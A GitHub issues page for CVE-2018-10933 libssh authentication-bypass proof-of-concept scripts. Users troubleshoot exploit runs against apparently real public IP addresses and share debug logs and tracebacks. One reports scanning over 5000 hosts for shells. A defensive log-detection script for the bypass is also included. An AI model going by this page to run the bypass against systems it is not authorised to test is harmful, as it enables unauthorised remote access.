
cve-2018-10933's People

Contributors

blacknbunny, dependabot[bot], heywoodlh


cve-2018-10933's Issues

something wrong with bypasswithfakekey.py use

Hello, I use it like that: python bypasswithfakekey.py --host 14.43.5.99 -key id_rsa.keyfile
The result is:
Traceback (most recent call last):
File "bypasswithfakekey.py", line 49, in <module>
main()
File "bypasswithfakekey.py", line 45, in main
except FileNotFoundError:
NameError: global name 'FileNotFoundError' is not defined
It can't work.
When I change line 45
(except FileNotFoundError:) to (except:), deleting the FileNotFoundError name,
and run again, the result is:
Generate a keyfile for tool to bypass remote/local server credentials.

Could you be more specific

How to use?!

Hey. I'm trying to figure out how to properly manage the exploit. I got some libssh hashes (from shodan.io). Take a look at my output. Did you see something wrong?

python bypasswithfakekey.py --host 52.1.229.77 -p 22 -key /root/.ssh/id_rsa
DEBUG:paramiko.transport:starting thread (client mode): 0x88e4b910L
DEBUG:paramiko.transport:Local version/idstring: SSH-2.0-paramiko_2.0.8
DEBUG:paramiko.transport:Remote version/idstring: SSH-2.0-libssh-0.7.2
INFO:paramiko.transport:Connected (version 2.0, client libssh-0.7.2)
DEBUG:paramiko.transport:kex algos:[u'[email protected]', u'ecdh-sha2-nistp256', u'diffie-hellman-group14-sha1', u'diffie-hellman-group1-sha1'] server key:[u'ssh-dss', u'ssh-rsa'] client encrypt:[u'aes256-ctr', u'aes192-ctr', u'aes128-ctr', u'aes256-cbc', u'aes192-cbc', u'aes128-cbc', u'blowfish-cbc', u'3des-cbc', u'des-cbc-ssh1'] server encrypt:[u'aes256-ctr', u'aes192-ctr', u'aes128-ctr', u'aes256-cbc', u'aes192-cbc', u'aes128-cbc', u'blowfish-cbc', u'3des-cbc', u'des-cbc-ssh1'] client mac:[u'hmac-sha2-256', u'hmac-sha2-512', u'hmac-sha1'] server mac:[u'hmac-sha2-256', u'hmac-sha2-512', u'hmac-sha1'] client compress:[u'none', u'zlib', u'[email protected]'] server compress:[u'none', u'zlib', u'[email protected]'] client lang:[u''] server lang:[u''] kex follows?False
DEBUG:paramiko.transport:Kex agreed: diffie-hellman-group1-sha1
DEBUG:paramiko.transport:Cipher agreed: aes128-ctr
DEBUG:paramiko.transport:MAC agreed: hmac-sha2-256
DEBUG:paramiko.transport:Compression agreed: none
/usr/local/lib/python2.7/dist-packages/paramiko/rsakey.py:130: CryptographyDeprecationWarning: signer and verifier have been deprecated. Please use sign and verify instead.
algorithm=hashes.SHA1(),
DEBUG:paramiko.transport:kex engine KexGroup1 specified hash_algo
DEBUG:paramiko.transport:Switch to new keys ...
/usr/local/lib/python2.7/dist-packages/paramiko/client.py:689: UserWarning: Unknown ssh-rsa host key for 52.1.229.77: 7eb5d5f3702b10f6a4fe922e3b4810a3
key.get_fingerprint())))
DEBUG:paramiko.transport:Trying SSH agent key d1b81b29bee25b8e6e293aa5faa26fa8
DEBUG:paramiko.transport:userauth is OK
INFO:paramiko.transport:Authentication (publickey) failed.
DEBUG:paramiko.transport:userauth is OK
INFO:paramiko.transport:Authentication (password) failed.

Authentication bypassed but can't spawn to shell. The server you're trying to bypass is patched, truncated or using wrong vulnerable libSSH version. -blacknbunny

DEBUG:paramiko.transport:EOF in transport thread

Authentication Bypassed ?

paramiko.ssh_exception.AuthenticationException can be due to anything. So isn't "Authentication bypassed but can't spawn to shell." a bit specific? How to make sure that authentication is really bypassed?

Also, if authentication is bypassed, can it be exploited in any other way rather than spawning a shell?

no shell back

I scanned nearly 5000+ hosts with libssh influenced by this vuln, but there was no shell with the code
spawncmd.invoke_shell()

paramiko.log looks like this, does it work correctly?

DEB [20181018-14:34:12.427] thr=1 paramiko.transport: starting thread (client mode): 0x3879c50L
DEB [20181018-14:34:12.428] thr=1 paramiko.transport: Local version/idstring: SSH-2.0-paramiko_2.4.2
DEB [20181018-14:34:12.441] thr=1 paramiko.transport: Remote version/idstring: SSH-2.0-OpenSSH_7.2p2 Ubuntu-4ubuntu2.4
INF [20181018-14:34:12.441] thr=1 paramiko.transport: Connected (version 2.0, client OpenSSH_7.2p2)
DEB [20181018-14:34:12.446] thr=1 paramiko.transport: kex algos:[u'[email protected]', u'ecdh-sha2-nistp256', u'ecdh-sha2-nistp384', u'ecdh-sha2-nistp521', u'diffie-hellman-group-exchange-sha256', u'diffie-hellman-group14-sha1'] server key:[u'ssh-rsa', u'rsa-sha2-512', u'rsa-sha2-256', u'ecdsa-sha2-nistp256', u'ssh-ed25519'] client encrypt:[u'[email protected]', u'aes128-ctr', u'aes192-ctr', u'aes256-ctr', u'[email protected]', u'[email protected]'] server encrypt:[u'[email protected]', u'aes128-ctr', u'aes192-ctr', u'aes256-ctr', u'[email protected]', u'[email protected]'] client mac:[u'[email protected]', u'[email protected]', u'[email protected]', u'[email protected]', u'[email protected]', u'[email protected]', u'[email protected]', u'hmac-sha2-256', u'hmac-sha2-512', u'hmac-sha1'] server mac:[u'[email protected]', u'[email protected]', u'[email protected]', u'[email protected]', u'[email protected]', u'[email protected]', u'[email protected]', u'hmac-sha2-256', u'hmac-sha2-512', u'hmac-sha1'] client compress:[u'none', u'[email protected]'] server compress:[u'none', u'[email protected]'] client lang:[u''] server lang:[u''] kex follows?False
DEB [20181018-14:34:12.447] thr=1 paramiko.transport: Kex agreed: ecdh-sha2-nistp256
DEB [20181018-14:34:12.447] thr=1 paramiko.transport: HostKey agreed: ssh-ed25519
DEB [20181018-14:34:12.447] thr=1 paramiko.transport: Cipher agreed: aes128-ctr
DEB [20181018-14:34:12.447] thr=1 paramiko.transport: MAC agreed: hmac-sha2-256
DEB [20181018-14:34:12.447] thr=1 paramiko.transport: Compression agreed: none
DEB [20181018-14:34:12.630] thr=1 paramiko.transport: kex engine KexNistp256 specified hash_algo
DEB [20181018-14:34:12.631] thr=1 paramiko.transport: Switch to new keys ...
DEB [20181018-14:34:12.632] thr=2 paramiko.transport: [chan 0] Max packet in: 32768 bytes
WAR [20181018-14:34:12.670] thr=1 paramiko.transport: Oops, unhandled type 3 ('unimplemented')
WAR [20181018-14:34:12.720] thr=1 paramiko.transport: Oops, unhandled type 3 ('unimplemented')
DEB [20181018-14:36:12.437] thr=1 paramiko.transport: EOF in transport thread

Questions about libSSH-Authentication-Bypass

Client side:

$ python libsshauthbypass.py  --host 172.17.0.4 -p22
/usr/local/lib/python2.7/dist-packages/paramiko/rsakey.py:130: CryptographyDeprecationWarning: signer and verifier have been deprecated. Please use sign and verify instead.
  algorithm=hashes.SHA1(),

Server Side:

$ ./samplesshd-cb --dsakey /root/.ssh/id_dsa --rsakey /root/.ssh/id_rsa 0.0.0.0 -p 22 -v
[2018/10/18 07:34:58.992643, 3] ssh_socket_pollcallback:  Received POLLOUT in connecting state
[2018/10/18 07:34:58.992749, 3] ssh_socket_unbuffered_write:  Enabling POLLOUT for socket
[2018/10/18 07:34:58.992958, 3] callback_receive_banner:  Received banner: SSH-2.0-paramiko_2.0.8
[2018/10/18 07:34:58.992987, 1] ssh_server_connection_callback:  SSH client banner: SSH-2.0-paramiko_2.0.8
[2018/10/18 07:34:58.993000, 1] ssh_analyze_banner:  Analyzing banner: SSH-2.0-paramiko_2.0.8
[2018/10/18 07:34:58.993060, 3] ssh_socket_unbuffered_write:  Enabling POLLOUT for socket
[2018/10/18 07:34:58.993074, 3] packet_send2:  packet: wrote [len=516,padding=10,comp=505,payload=505]
[2018/10/18 07:34:58.993779, 3] ssh_packet_socket_callback:  packet: read type 20 [len=596,padding=8,comp=587,payload=587]
[2018/10/18 07:34:58.993814, 3] ssh_packet_process:  Dispatching handler for packet type 20
[2018/10/18 07:34:58.993844, 3] crypt_set_algorithms_server:  Set output algorithm aes128-ctr
[2018/10/18 07:34:58.993853, 3] crypt_set_algorithms_server:  Set input algorithm aes128-ctr
[2018/10/18 07:34:58.993860, 3] crypt_set_algorithms_server:  Set HMAC output algorithm to hmac-sha2-256
[2018/10/18 07:34:58.993869, 3] crypt_set_algorithms_server:  Set HMAC input algorithm to hmac-sha2-256
[2018/10/18 07:34:59.045960, 3] ssh_packet_socket_callback:  packet: read type 30 [len=140,padding=5,comp=134,payload=134]
[2018/10/18 07:34:59.046017, 3] ssh_packet_process:  Dispatching handler for packet type 30
[2018/10/18 07:34:59.046029, 3] ssh_packet_kexdh_init:  Received SSH_MSG_KEXDH_INIT
[2018/10/18 07:34:59.048511, 3] ssh_socket_unbuffered_write:  Enabling POLLOUT for socket
[2018/10/18 07:34:59.048553, 3] packet_send2:  packet: wrote [len=700,padding=8,comp=691,payload=691]
[2018/10/18 07:34:59.048597, 3] packet_send2:  packet: wrote [len=12,padding=10,comp=1,payload=1]
[2018/10/18 07:34:59.048605, 3] dh_handshake_server:  SSH_MSG_NEWKEYS sent
[2018/10/18 07:34:59.048664, 3] ssh_socket_unbuffered_write:  Enabling POLLOUT for socket
[2018/10/18 07:34:59.089804, 3] ssh_packet_socket_callback:  packet: read type 21 [len=12,padding=10,comp=1,payload=1]
[2018/10/18 07:34:59.089866, 3] ssh_packet_process:  Dispatching handler for packet type 21
[2018/10/18 07:34:59.089880, 2] ssh_packet_newkeys:  Received SSH_MSG_NEWKEYS
[2018/10/18 07:34:59.089920, 3] ssh_handle_key_exchange:  ssh_handle_key_exchange: current state : 7
[2018/10/18 07:34:59.093583, 3] ssh_packet_socket_callback:  packet: read type 52 [len=12,padding=10,comp=1,payload=1]
[2018/10/18 07:34:59.093626, 3] ssh_packet_process:  Dispatching handler for packet type 52
[2018/10/18 07:34:59.093693, 3] ssh_packet_userauth_success:  Authentication successful
[2018/10/18 07:34:59.145509, 3] ssh_packet_socket_callback:  packet: read type 90 [len=44,padding=19,comp=24,payload=24]
[2018/10/18 07:34:59.145565, 3] ssh_packet_process:  Dispatching handler for packet type 90
[2018/10/18 07:34:59.145579, 3] ssh_packet_channel_open:  Clients wants to open a session channel
Allocated session channel
[2018/10/18 07:34:59.145602, 3] ssh_message_channel_request_open_reply_accept_channel:  Accepting a channel request_open for chan 0
[2018/10/18 07:34:59.145681, 3] ssh_socket_unbuffered_write:  Enabling POLLOUT for socket
[2018/10/18 07:34:59.145709, 3] packet_send2:  packet: wrote [len=28,padding=10,comp=17,payload=17]
[2018/10/18 07:34:59.160915, 3] ssh_packet_socket_callback:  packet: read type 98 [len=28,padding=12,comp=15,payload=15]
[2018/10/18 07:34:59.160974, 3] ssh_packet_process:  Dispatching handler for packet type 98
[2018/10/18 07:34:59.160990, 3] ssh_message_handle_channel_request:  Received a shell channel_request for channel (43:0) (want_reply=1)
Allocated shell
[2018/10/18 07:34:59.161004, 3] ssh_message_channel_request_reply_success:  Sending a channel_request success to channel 0
[2018/10/18 07:34:59.161073, 3] ssh_socket_unbuffered_write:  Enabling POLLOUT for socket
[2018/10/18 07:34:59.161101, 3] packet_send2:  packet: wrote [len=12,padding=6,comp=5,payload=5]
[2018/10/18 07:34:59.262384, 1] ssh_socket_exception_callback:  Socket exception callback: 1 (0)
[2018/10/18 07:34:59.262443, 1] ssh_socket_exception_callback:  Socket error: disconnected
Error : Socket error: disconnected

Do you know why it doesn't spawn a shell? Thank you.
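
For defenders reading the server-side log above: the server reads packet type 52 (SSH_MSG_USERAUTH_SUCCESS, a server-to-client message in RFC 4252) and logs "Authentication successful" without any type 50 (SSH_MSG_USERAUTH_REQUEST) before it. The following added example, which is not part of the issue or of the project's code, flags that pattern in libssh verbose logs; the function name, the benign sample and the one-connection-per-log assumption are illustrative.

```python
import re

# SSH message numbers from RFC 4252 (userauth) and RFC 4254 (channels).
USERAUTH_REQUEST = 50
USERAUTH_SUCCESS = 52  # server-to-client only; a server should never receive it
CHANNEL_OPEN = 90

# Matches libssh verbose lines of the form shown in the server log above:
# [2018/10/18 07:34:59.093583, 3] ssh_packet_socket_callback:  packet: read type 52 [...]
READ_RE = re.compile(
    r"^\[(?P<ts>[^,\]]+), \d+\] ssh_packet_socket_callback:\s+"
    r"packet: read type (?P<type>\d+)\b"
)

def find_client_sent_success(lines):
    """Return one finding per USERAUTH_SUCCESS packet the server *read*.

    Assumption (hypothetical helper): the log covers a single connection,
    as in the samplesshd-cb run above.
    """
    findings = []
    auth_requests = 0
    pending = None
    for line in lines:
        m = READ_RE.match(line.strip())
        if not m:
            continue
        msg_type = int(m.group("type"))
        if msg_type == USERAUTH_REQUEST:
            auth_requests += 1
        elif msg_type == USERAUTH_SUCCESS:
            pending = {
                "timestamp": m.group("ts"),
                "auth_requests_before": auth_requests,
                "channel_opened_after": False,
            }
            findings.append(pending)
        elif msg_type == CHANNEL_OPEN and pending is not None:
            pending["channel_opened_after"] = True
    return findings

# Excerpt reusing lines from the server-side log in the post above.
SAMPLE_LOG = """\
[2018/10/18 07:34:59.089804, 3] ssh_packet_socket_callback:  packet: read type 21 [len=12,padding=10,comp=1,payload=1]
[2018/10/18 07:34:59.093583, 3] ssh_packet_socket_callback:  packet: read type 52 [len=12,padding=10,comp=1,payload=1]
[2018/10/18 07:34:59.093693, 3] ssh_packet_userauth_success:  Authentication successful
[2018/10/18 07:34:59.145509, 3] ssh_packet_socket_callback:  packet: read type 90 [len=44,padding=19,comp=24,payload=24]
""".splitlines()

# Constructed benign session: service request, auth request, channel open.
BENIGN_LOG = """\
[2018/10/18 08:00:00.000001, 3] ssh_packet_socket_callback:  packet: read type 5 [len=28,padding=10,comp=17,payload=17]
[2018/10/18 08:00:00.000002, 3] ssh_packet_socket_callback:  packet: read type 50 [len=60,padding=7,comp=52,payload=52]
[2018/10/18 08:00:00.000003, 3] ssh_packet_socket_callback:  packet: read type 90 [len=44,padding=19,comp=24,payload=24]
""".splitlines()

if __name__ == "__main__":
    for finding in find_client_sent_success(SAMPLE_LOG):
        print("client-sent USERAUTH_SUCCESS:", finding)
```

A finding with `auth_requests_before == 0` and `channel_opened_after == True` means the server opened a channel for a client that never sent an authentication request.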

error

File "libsshauthbypass.py", line 68, in <module>
exit(main())
File "libsshauthbypass.py", line 65, in main
BypasslibSSHwithoutcredentials(hostname, port, command)
File "libsshauthbypass.py", line 35, in BypasslibSSHwithoutcredentials
spawncmd = transport.open_session(timeout=10)
File "/usr/local/lib/python2.7/dist-packages/paramiko/transport.py", line 712, in open_session
timeout=timeout)
File "/usr/local/lib/python2.7/dist-packages/paramiko/transport.py", line 836, in open_channel
raise e
EOFError

Administratively Prohibited

Hi !

First I would like to thank you for sharing this PoC with the community so we can patch our vulnerable servers. The main reason why I opened this issue is because I'm getting the following error message each time:

paramiko.ssh_exception.ChannelException: (1, 'Administratively prohibited')

Any help would be very appreciated.

Thanks

what is wrong here ?

What is wrong here? I installed python-paramiko.

root@test-VM:/home/test# python3 asd.py
Traceback (most recent call last):
File "asd.py", line 4, in <module>
import paramiko
ModuleNotFoundError: No module named 'paramiko'

what's wrong ?

Hi
When I do python libsshauthbypass.py -h IP_ADDRESS -p 22 -log /home/test/1a.txt
it responds with the help menu again and the log file is empty.

What am I doing wrong there?
Thanks!

Always "Administratively prohibited..."

I've tested this with several apparently vulnerable SSH servers (using hassh values to identify them), and I've tried using it with the examplesshd-cb binary both on a remote system and on the local system using 127.0.0.1, but every attempt resulted in the "Administratively prohibited..." message. Below is the log from the local attempt that most directly follows your instructions:

examplesshd-cb-local.log

I had paramiko v2.4.2 and python v3.4.3 installed.

python libsshauthbypass.py

CryptographyDeprecationWarning: signer and verifier have been deprecated. Please use sign and verify instead.
algorithm=hashes.SHA1(),

Allocated session channel
Allocated shell
Error : Socket error: disconnected

TCP forwarding disabled on the remote/local server can't connect.

TCP forwarding disabled on the remote/local server can't connect.
python libsshauthbypass.py --host 50.227.32.186 --port 22
No handlers could be found for logger "paramiko.transport"
TCPForwarding disabled on remote/local server can't connect.not vulnerable

Can you suggest troubleshooting for this issue?

what writes to log file ?

Hi
After running the script, it writes to the log file without any error response.

I run the code: root@test-VirtualBox:/home/test/libSSH-Authentication-Bypass# python3 libsshauthbypass.py --host xxx -p 2222 -log /home/test/Desktop/ccc.txt

and it writes to the log file:

DEB [20181020-12:33:16.184] thr=1 paramiko.transport: starting thread (client mode): 0x5e526940
DEB [20181020-12:33:16.185] thr=1 paramiko.transport: Local version/idstring: SSH-2.0-paramiko_2.4.2
DEB [20181020-12:33:16.327] thr=1 paramiko.transport: Remote version/idstring: SSH-2.0-libssh-0.5.2
INF [20181020-12:33:16.327] thr=1 paramiko.transport: Connected (version 2.0, client libssh-0.5.2)
DEB [20181020-12:33:16.470] thr=1 paramiko.transport: kex algos:['diffie-hellman-group1-sha1'] server key:['ssh-dss', 'ssh-rsa'] client encrypt:['aes256-ctr', 'aes192-ctr', 'aes128-ctr', 'aes256-cbc', 'aes192-cbc', 'aes128-cbc', 'blowfish-cbc', '3des-cbc'] server encrypt:['aes256-ctr', 'aes192-ctr', 'aes128-ctr', 'aes256-cbc', 'aes192-cbc', 'aes128-cbc', 'blowfish-cbc', '3des-cbc'] client mac:['hmac-sha1'] server mac:['hmac-sha1'] client compress:['none', 'zlib', '[email protected]'] server compress:['none', 'zlib', '[email protected]'] client lang:[''] server lang:[''] kex follows?False
DEB [20181020-12:33:16.470] thr=1 paramiko.transport: Kex agreed: diffie-hellman-group1-sha1
DEB [20181020-12:33:16.470] thr=1 paramiko.transport: HostKey agreed: ssh-rsa
DEB [20181020-12:33:16.470] thr=1 paramiko.transport: Cipher agreed: aes128-ctr
DEB [20181020-12:33:16.470] thr=1 paramiko.transport: MAC agreed: hmac-sha1
DEB [20181020-12:33:16.471] thr=1 paramiko.transport: Compression agreed: none
DEB [20181020-12:33:16.730] thr=1 paramiko.transport: kex engine KexGroup1 specified hash_algo
DEB [20181020-12:33:16.809] thr=1 paramiko.transport: Switch to new keys ...
DEB [20181020-12:33:16.811] thr=2 paramiko.transport: [chan 0] Max packet in: 32768 bytes
DEB [20181020-12:33:17.048] thr=1 paramiko.transport: [chan 0] Max packet out: 35000 bytes
DEB [20181020-12:33:17.048] thr=1 paramiko.transport: Secsh channel 0 opened.
DEB [20181020-12:33:17.191] thr=1 paramiko.transport: [chan 0] Sesch channel 0 request ok

I don't know what it is and what to do with this or what to do after?
Thanks !

Error with cmd

Why did I receive an error when arriving at cmd?

Traceback (most recent call last):
File "test.py", line 17, in <module>
stdin, stdout, stderr = client.exec_command('ls')
File "/usr/local/lib/python2.7/dist-packages/paramiko/client.py", line 429, in exec_command
chan.exec_command(command)
File "/usr/local/lib/python2.7/dist-packages/paramiko/channel.py", line 62, in _check
return func(self, *args, **kwds)
File "/usr/local/lib/python2.7/dist-packages/paramiko/channel.py", line 240, in exec_command
self._wait_for_event()
File "/usr/local/lib/python2.7/dist-packages/paramiko/channel.py", line 1143, in _wait_for_event
raise e
paramiko.ssh_exception.SSHException: Channel closed.
DEBUG:paramiko.transport:EOF in transport thread
